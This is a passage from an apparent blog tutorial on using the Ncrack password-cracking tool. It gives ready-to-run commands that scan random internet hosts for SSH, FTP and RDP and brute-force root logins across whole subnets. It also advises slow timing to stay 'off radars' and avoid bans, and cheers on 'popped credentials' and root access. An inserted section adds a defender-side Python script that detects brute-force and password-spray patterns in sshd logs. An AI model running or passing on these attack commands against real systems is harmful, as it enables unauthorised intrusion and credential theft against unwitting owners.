</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">I tend to use option 1 the most myself, as if I am not inputting an entire list I am typically only running against a single host IP, which can simply be typed out on the command line (you can type multiple if you want to, but I use files for more than 2 myself). I should also note that you can exclude a particular IP or range of IPs with the addition of “--exclude IP1,IP2,IP3” or “--excludefile path/to/excludefile.txt”. This will keep you from scanning sensitive or production machines if you are trying to be stealthy or respectful. OK, so that covers target input, now let us move to the modules and how to set them up.</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">We have modules available for cracking the FTP, SSH, Telnet, HTTP(S), POP3(S), SMB, RDP, and VNC protocols. You can choose to use the modules one at a time or you can use multiple modules together to perform a multi-protocol attack. When you identify the module(s) you will use for your attack you also need to define a few configuration settings to handle timing, authentication, etc., all of which affect how well it does or does not work. Here are the options available and a little bit about what they do:</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l6 level1 lfo2; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">-m allows us to define settings specific to a single module (as defined by what follows the –m</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l6 level2 lfo2; text-indent: -0.25in;"><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Example: -m ssh:at=25</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1.5in; mso-add-space: auto; mso-list: l6 level3 lfo2; text-indent: -0.25in;"><span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span style="mso-list: Ignore;">§<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Sets the authentication attempts (-at) per connection to 25 for the SSH module</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l6 level1 lfo2; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">-p allows you to choose multiple modules for attacking hosts</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; 
mso-add-space: auto; mso-list: l6 level2 lfo2; text-indent: -0.25in;"><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Example: -p ssh,pop3 192.168.1.0/24</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1.5in; mso-add-space: auto; mso-list: l6 level3 lfo2; text-indent: -0.25in;"><span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span style="mso-list: Ignore;">§<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Uses SSH & POP3 modules against the whole IP range 192.168.1.0-255 since it knows to read the CIDR block /24 and convert to IP range</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1.5in; mso-add-space: auto; mso-list: l6 level3 lfo2; text-indent: -0.25in;"><span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span style="mso-list: Ignore;">§<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">You can also have the modules run against non-standard ports by simply indicating the port after the module name or IP address</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 2in; mso-add-space: auto; mso-list: l6 level4 lfo2; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Example: -p ssh:22,22222,pop3 192.168.1.0/24</span></div><div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 2in; mso-add-space: auto; mso-list: l6 
level4 lfo2; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Example 2: ncrack ftp://192.168.1.* ssh://192.168.1.*:2222</span></div><div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 2.5in; mso-add-space: auto; mso-list: l6 level5 lfo2; text-indent: -0.25in;"><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Modules will know to look on the default port if none is defined</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l6 level1 lfo2; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">-g lets you set configuration settings globally, across all modules at once; this can be used on its own or in combination with module-specific settings</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l6 level2 lfo2; text-indent: -0.25in;"><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Example: ncrack -p ssh://192.168.1.0/24,cl=25 -m ssh:at=15 -g cd=3000</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1.5in; mso-add-space: auto; mso-list: l6 level3 lfo2; text-indent: -0.25in;"><span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span style="mso-list: Ignore;">§<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">This will use the SSH module against the 192.168.1.0 network with a minimum connection limit (cl=) of 25 and a maximum of 15 authentication tries per connection (at=), while the global (-g) connection delay (cd=) between attempts is set to 3000 seconds</span></div><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 1.5in; mso-add-space: auto;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;"><b style="mso-bidi-font-weight: normal;">NOTE:</b> all timing options are assumed to be provided in seconds unless you specify otherwise. You can append one of the following to the time: “ms” for milliseconds, “m” for minutes, or “h” for hours. Also note that there should be no spaces when defining module details, as NCRACK treats anything that is not an option as a host, and a stray space can change how the arguments are interpreted.</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">You can get very detailed with the timing options, as the configuration settings allow a great deal of flexibility. However, I like to keep things a bit easier and use the predefined templates, since the tool has some cool built-in technology to auto-adjust line rates, attempts and metric parameters on the fly based on network traffic analysis done by the internal scan engine. You can pick the timing template by simply using the “-T” argument followed by the number of the template you want to use. These are similar to the ones you may know from NMAP scans. The available options are 0-5, which equate to the following:</span></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">paranoid (0), sneaky (1), polite (2), normal (3), aggressive (4), and insane (5)</span></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><br />
</div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Calibri;"><strong>Example:</strong> ncrack -v -T1 --user root ssh://192.168.0.0/24</span></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span style="mso-list: Ignore;">§<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">This will launch the SSH module against the whole network using the sneaky timing template. This works well for keeping off radars and avoiding IP bans, but may take considerably longer to run through all of your possibilities.</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;"><b style="mso-bidi-font-weight: normal;">NOTE:</b> Timing levels of T4 &amp; T5 can cause denial of service conditions on some slower services like RDP and SSH, so you may want to do a little research on the ins and outs of each protocol to help you come up with what works best.</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">At this point you have most of the options you need to run Ncrack, since it comes with a decent number of username and password lists by default; all of them can be found in the “/install/path/ncrack/lists/” directory. If you want to use your own custom username list or password list you can do that too. Here are the available options to choose from, depending on how you want to set things up:</span></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">“-U” will define a single username to attack</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">“--user /path/to/userfile.txt” will define the path to the file of usernames to use for attacks</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">“-P /path/to/passfile.txt” will define the path to the file of passwords to use for attacks</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">“--pass password1,password2,password3” lets you supply a comma-separated password list directly on the command line</span></div><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 38.55pt; mso-add-space: auto; mso-list: l3 level1 lfo3; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">“--passwords-first” will instruct NCRACK to try all possible passwords for each username before moving on to the next username, whereas by default it tries every username against the current password before moving on to the next password. This is helpful if you are 100% sure you know the username you are attacking, as opposed to bruteforcing both user and pass combinations (for example if you dumped a database and are checking the credentials on known systems)</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">OK, that covers the basics. Here are a few real-world examples of how I would go about it on Linux, as well as a nice short video I put together of the whole thing in action:</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: Calibri;">Step 1: Find open SSH, FTP and RDP ports to target using your favorite scanner (mine is NMAP)…</span></b></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 0.25in; mso-add-space: auto; mso-list: l4 level1 lfo6; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">nmap -T4 -iR &lt;# of target IPs to randomly scan&gt; -sS -p22,2222,21,3389 -oX targets.xml</span></div><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 0.25in; mso-add-space: auto;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;"><b style="mso-bidi-font-weight: normal;">NOTE:</b> If you set the # of targets to zero (0) it will scan indefinitely which can be handy from time to time…</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">This will run an NMAP scan for open SSH ports on the default port 22, or the infamous beginner admin move to port 2222 (silly admins), as well as FTP and RDP services on their default ports. It uses reasonably fast but not super-aggressive timing, and uses SYN packets for the discovery. It also makes it easier to pick targets for NCRACK: the “-oX &lt;filename&gt;” option sends all output to an XML file, which can then be fed into NCRACK with the “-iX” option as I described above. </span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: Calibri;">Step 2: Figure out which modules we want to attack with and which user/pass lists we will use (if any other than the defaults):</span></b></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l0 level1 lfo4; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">What ports did we scan for? That determines which modules to use…</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l0 level1 lfo4; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Did we run the scans in a way that lets us import the results to keep things easier? If so, where is the file located and what is it called? Knowing this helps you get the command syntax right…</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l0 level1 lfo4; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Do we want to attack more than one protocol? If so, make sure to use the right arguments or create a specific scan for each attack you want to run…</span></div><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l0 level1 lfo4; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">Keep this info handy :p</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: Calibri;">Step 3: Run NCRACK and await the results…hopefully with popped credentials that give you access, or even better, full root access.</span></b></div><div class="MsoListParagraph" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l5 level1 lfo5; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">You can hit Enter to get a status update in the terminal while waiting for it to run its course, and pressing “p” will print a list of all the successful credentials found so far if you want to see mid-scan what has been found. </span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><span style="font-family: "Calibri", "sans-serif"; font-size: 11pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">When it is done it will show you the results, and you can then continue as you like from there. I hope you enjoyed this informative tutorial on a great cracking tool made by a great team. It is one you should definitely add to your collection if you don’t have it already. If you have never used it before, I highly encourage you to try it out. I haven’t had great success with SSH or HTTP myself, but it is hands down the fastest for FTP and very good at handling RDP and VNC as well. Below is a little bonus video to show you an example of how it can be used against FTP. I hope you enjoyed this tutorial as much as the others, and I encourage you to check back often to see what else I have covered or come up with. If you have any questions on anything, please just comment or shoot me a note. </span><br />
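As an added, defender-side example (not code from the original post or from the Ncrack project): a small Python detector run over constructed sshd-style log lines, showing how the two attempt orderings described above (the default user-per-password order versus --passwords-first) look on the receiving end, and how the sneaky timing template slips under a short analysis window but not a longer one. The log format, thresholds and addresses are assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sshd-style log lines (syslog timestamps omit the year).
# 198.51.100.7 follows the default order: one password tried across many users.
# 203.0.113.9 is "sneaky": one failure on root roughly every 15 minutes.
SAMPLE_LOG = """\
Mar 19 22:00:01 bastion sshd[4100]: Failed password for root from 198.51.100.7 port 40001 ssh2
Mar 19 22:00:02 bastion sshd[4101]: Failed password for invalid user admin from 198.51.100.7 port 40002 ssh2
Mar 19 22:00:03 bastion sshd[4102]: Failed password for invalid user oracle from 198.51.100.7 port 40003 ssh2
Mar 19 22:00:04 bastion sshd[4103]: Failed password for invalid user backup from 198.51.100.7 port 40004 ssh2
Mar 19 22:10:00 bastion sshd[4200]: Failed password for root from 203.0.113.9 port 50001 ssh2
Mar 19 22:25:00 bastion sshd[4201]: Failed password for root from 203.0.113.9 port 50002 ssh2
Mar 19 22:30:00 bastion sshd[4300]: Accepted publickey for alice from 192.0.2.5 port 60000 ssh2
Mar 19 22:40:00 bastion sshd[4202]: Failed password for root from 203.0.113.9 port 50003 ssh2
Mar 19 22:55:00 bastion sshd[4203]: Failed password for root from 203.0.113.9 port 50004 ssh2
"""

FAIL_RE = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed "
                     r"password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+")

def parse_failures(text, year=2015):
    """Return sorted (timestamp, source_ip, username) tuples for failed logins."""
    events = []
    for line in text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["src"], m["user"]))
    return sorted(events)

def detect(events, window_seconds, per_user=3, distinct_users=4):
    """Slide a window over each source's failures: many distinct users in one window
    is the default user-per-password order (spray); many failures on one user is
    --passwords-first style (brute). Returns {source_ip: verdict}."""
    window = timedelta(seconds=window_seconds)
    by_src = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((ts, user))
    verdicts = {}
    for src, evs in by_src.items():
        for i, (start, _) in enumerate(evs):
            users = [u for t, u in evs[i:] if t - start <= window]
            if len(set(users)) >= distinct_users:
                verdicts[src] = "spray"
                break
            if max(Counter(users).values()) >= per_user:
                verdicts[src] = "brute"
                break
    return verdicts

if __name__ == "__main__":
    evs = parse_failures(SAMPLE_LOG)
    print(detect(evs, 60))    # one-minute window: only the burst is flagged
    print(detect(evs, 3600))  # one-hour window: the slow source shows up too
```

The thresholds are deliberately low for the constructed sample; on a real host, tune the window and counts to the service's normal failure rate so that a T1 run still crosses them.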
<br />
<strong><u>VIDEO:</u></strong><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/krugWwmNeuA?feature=player_embedded' frameborder='0'></iframe></div><br />
<br />
<div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt; text-align: center;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: Calibri;">Until next time, Enjoy!</span></b></div>